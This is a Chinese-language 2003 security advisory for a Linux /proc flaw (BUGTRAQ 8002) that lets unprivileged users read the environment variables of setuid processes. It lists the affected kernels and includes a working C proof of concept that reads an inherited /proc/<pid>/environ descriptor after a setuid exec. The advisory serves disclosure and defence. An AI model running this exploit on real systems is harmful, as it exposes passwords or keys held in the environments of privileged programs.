
Linux /proc伪文件系统信息泄露漏洞


发布时间:2003-06-20
更新时间:2003-06-20
严重程度:
威胁程度:服务器信息泄露
错误类型:设计错误
利用方式:服务器模式

BUGTRAQ ID:8002

受影响系统
Linux kernel 2.2                              
Linux kernel 2.2.1                            
Linux kernel 2.2.2                            
Linux kernel 2.2.3                            
Linux kernel 2.2.4                            
Linux kernel 2.2.5                            
Linux kernel 2.2.6                            
Linux kernel 2.2.7                            
Linux kernel 2.2.8                            
Linux kernel 2.2.9                            
Linux kernel 2.2.10                            
   +Caldera OpenLinux 2.3                      
Linux kernel 2.2.11                            
Linux kernel 2.2.12                            
Linux kernel 2.2.13                            
   +S.u.S.E. Linux 6.3                        
   +S.u.S.E. Linux 6.4                        
Linux kernel 2.2.14                            
   +RedHat Linux 6.2                          
   +SCO eDesktop 2.4                          
   +SCO eServer 2.3.1                          
   +Sun Cobalt RaQ 4                          
Linux kernel 2.2.15                            
   +MandrakeSoft Corporate Server 1.0.1        
   +MandrakeSoft Linux Mandrake 7.1            
Linux kernel 2.2.16                            
   +RedHat Linux 7.0                          
   +Sun Cobalt Qube 3                          
   +Sun Cobalt RaQ XTR                        
   +Trustix Secure Linux 1.1                  
Linux kernel 2.2.17                            
   +MandrakeSoft Linux Mandrake 7.2            
   +S.u.S.E. Linux 7.0                        
   +Trustix Secure Linux 1.2                  
Linux kernel 2.2.18                            
   +Wirex Immunix OS 6.2                      
   +Wirex Immunix OS 7.0                      
   +Wirex Immunix OS 7.0 -Beta                
Linux kernel 2.2.19                            
   +EnGarde Secure Linux 1.0.1                
   +MandrakeSoft Linux Mandrake 8.0            
   +MandrakeSoft Linux Mandrake 8.0 ppc        
   +MandrakeSoft Linux Mandrake 8.1            
   +MandrakeSoft Single Network Firewall 7.2  
   +S.u.S.E. Linux 6.3                        
   +S.u.S.E. Linux 6.4                        
   +S.u.S.E. Linux 7.0                        
   +Trustix Secure Linux 1.5                  
Linux kernel 2.2.20                            
   +MandrakeSoft Linux Mandrake 8.2            
   +MandrakeSoft Linux Mandrake 8.2 ppc        
Linux kernel 2.2.21                            
Linux kernel 2.2.22                            
   +Trustix Secure Linux 1.1                  
   +Trustix Secure Linux 1.2                  
   +Trustix Secure Linux 1.5                  
Linux kernel 2.2.23                            
Linux kernel 2.2.24                            
Linux kernel 2.2.25                            
Linux kernel 2.4.1                            
Linux kernel 2.4.2                            
   +Caldera OpenLinux Server 3.1              
   +Caldera OpenLinux Workstation 3.1          
   +RedHat Linux 7.1 alpha                    
   +RedHat Linux 7.1 i386                      
Linux kernel 2.4.3                            
   +MandrakeSoft Linux Mandrake 8.0            
   +MandrakeSoft Linux Mandrake 8.0 ppc        
Linux kernel 2.4.4                            
   +S.u.S.E. Linux 7.2                        
Linux kernel 2.4.5                            
   +Slackware Linux 8.0                        
Linux kernel 2.4.6                            
Linux kernel 2.4.7                            
   +RedHat Linux 7.2                          
   +S.u.S.E. Linux 7.1                        
   +S.u.S.E. Linux 7.2                        
Linux kernel 2.4.8                            
   +MandrakeSoft Linux Mandrake 8.0            
   +MandrakeSoft Linux Mandrake 8.1            
   +MandrakeSoft Linux Mandrake 8.2            
Linux kernel 2.4.9                            
   +RedHat Enterprise Linux AS 2.1            
   +RedHat Enterprise Linux ES 2.1            
   +RedHat Enterprise Linux WS 2.1            
   +RedHat Linux 7.1 alpha                    
   +RedHat Linux 7.1 i386                      
   +RedHat Linux 7.1 ia64                      
   +RedHat Linux 7.2 alpha                    
   +RedHat Linux 7.2 i386                      
   +RedHat Linux 7.2 ia64                      
   +Sun Linux 5.0                              
   +Sun Linux 5.0.3                            
Linux kernel 2.4.10                            
   +S.u.S.E. Linux 7.3                        
Linux kernel 2.4.11                            
Linux kernel 2.4.12                            
   +Conectiva Linux 7.0                        
Linux kernel 2.4.13                            
   +Caldera OpenLinux Server 3.1.1            
   +Caldera OpenLinux Workstation 3.1.1        
Linux kernel 2.4.14                            
Linux kernel 2.4.15                            
Linux kernel 2.4.16                            
   +Sun Cobalt RaQ 550                        
Linux kernel 2.4.17                            
Linux kernel 2.4.18                            
   +Astaro Security Linux 2.0 16              
   +Astaro Security Linux 2.0 23              
   +MandrakeSoft Linux Mandrake 8.0            
   +MandrakeSoft Linux Mandrake 8.1            
   +MandrakeSoft Linux Mandrake 8.2            
   +RedHat Linux 7.3                          
   +RedHat Linux 8.0                          
   +S.u.S.E. Linux 7.1                        
   +S.u.S.E. Linux 7.2                        
   +S.u.S.E. Linux 7.3                        
   +S.u.S.E. Linux 8.0                        
Linux kernel 2.4.19                            
   +Conectiva Linux 8.0                        
   +Conectiva Linux Enterprise Edition 1.0    
   +MandrakeSoft Linux Mandrake 9.0            
   +S.u.S.E. Linux 8.1                        
Linux kernel 2.4.20                            
   +CRUX CRUX Linux 1.0                        
   +RedHat Linux 9.0 i386                      
   +Slackware Linux 9.0                        
Linux kernel 2.4.21
详细描述
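Linux的/proc伪文件系统在实现上存在问题:当一个setuid程序被执行时,非授权用户可能读取到该suid进程的部分环境变量,从而导致敏感信息泄露。从下面的测试代码可以看出,问题出在进程执行setuid程序之前打开的/proc/<pid>/environ文件描述符上,该描述符在exec之后仍然可以被读取。因此,特权程序的环境变量中不应存放口令、密钥等敏感数据。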

测试代码
/****************************************************************
*                                                               *
*       Linux /proc information disclosure PoC                  *
*       by IhaQueR                                              *
*                                                               *
****************************************************************/



#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>



/* Scratch buffer for the /proc path strings that main() formats with sprintf(). */
static char buf[128];



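/**
 * Report a fatal error and terminate the process with exit status 129.
 *
 * If errno is zero on entry, "FATAL: <msg>" is written to stderr; otherwise
 * perror(msg) is used so the system error text is appended. Both stdout and
 * stderr are flushed before exiting. This function does not return.
 *
 * @param msg  short description of the operation that failed
 */
void fatal(const char *msg)
{
    /*
     * Capture errno before any stdio call: printf() may itself modify errno,
     * which would make the branch below report the wrong error (or report an
     * error where the caller had none).
     */
    const int saved_errno = errno;

    printf("\n");
    if (saved_errno == 0) {
        fprintf(stderr, "FATAL: %s\n", msg);
    } else {
        errno = saved_errno;    /* perror() reads errno, so restore it */
        perror(msg);
    }

    printf("\n");
    fflush(stdout);
    fflush(stderr);
    exit(129);
}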


/*
 * Demonstration for the advisory above: a descriptor for this process's own
 * /proc/<pid>/environ is opened first, then the process forks. The parent
 * replaces itself with /bin/ping (announced by the program as the setuid
 * step), and the child reads from the descriptor it inherited and prints
 * whatever the kernel returns.
 *
 * NOTE(review): a successful read in the child suggests access to the file is
 * decided when it is opened and not re-evaluated after the exec; confirm
 * against the kernel fix. For defenders the takeaway is that the environment
 * of a privileged program must not be treated as private on affected kernels.
 *
 * Returns 0 on the fall-through path; fatal() exits with 129 on errors.
 */
int main()
{
    int fd, r;
    char c;

    /* The formatted paths are short, so they fit in the 128-byte buf;
     * NOTE(review): sprintf() itself does no bounds checking. */
    sprintf(buf, "/proc/%d/environ", getpid());
    fd = open(buf, O_RDONLY);
    /* NOTE(review): open() reports failure as -1 and 0 is a valid descriptor,
     * so this test also treats fd == 0 as an error. */
    if (fd > 0) {
        /* buf is reused: it now names this (pre-fork) process's /proc directory. */
        sprintf(buf, "/proc/%d", getpid());
        /* NOTE(review): a failed fork() returns -1, which is nonzero and
         * therefore takes the parent branch. */
        if (fork()) {
            printf("\nparent executing setuid\n");
            fflush(stdout);
            /* On success execl() does not return; the pid stays the same, so
             * buf and fd still refer to this process's /proc entries. */
            execl("/bin/ping", "ping", "-c", "3", "127.0.0.1", NULL);
            fatal("execl");
        } else {
            /* Timing-based: waits one second so the parent has likely
             * completed its execl() before the first read. */
            sleep(1);
            printf("\nchild reads parent's proc:\n");
            fflush(stdout);
            /* Copy the file to stdout one byte at a time until EOF or error. */
            while (1) {
                r = read(fd, &c, 1);
                if (r <= 0)
                    break;
                printf("%c", c);
            }
            printf("\n\nContent of %s\n", buf);
            fflush(stdout);
            /* Lists the parent's /proc directory; the return value is not
             * checked, so a failed execl() falls through to the code below. */
            execl("/bin/ls", "ls", "-l", buf, NULL);
        }
    } else
        fatal("open proc");

    /* Reached only when the child's execl() of /bin/ls failed. */
    printf("\n");
    fflush(stdout);

    return 0;
}

解决方案
截至本文发布时(2003-06-20),厂商还未提供解决方案。请关注所用发行版的内核安全更新。

相关信息
Paul Starzetz <paul@starzetz.de>

Linux /proc sensitive information disclosure
http://archives.neohapsis.com/archives/bugtraq/2003-06/0158.html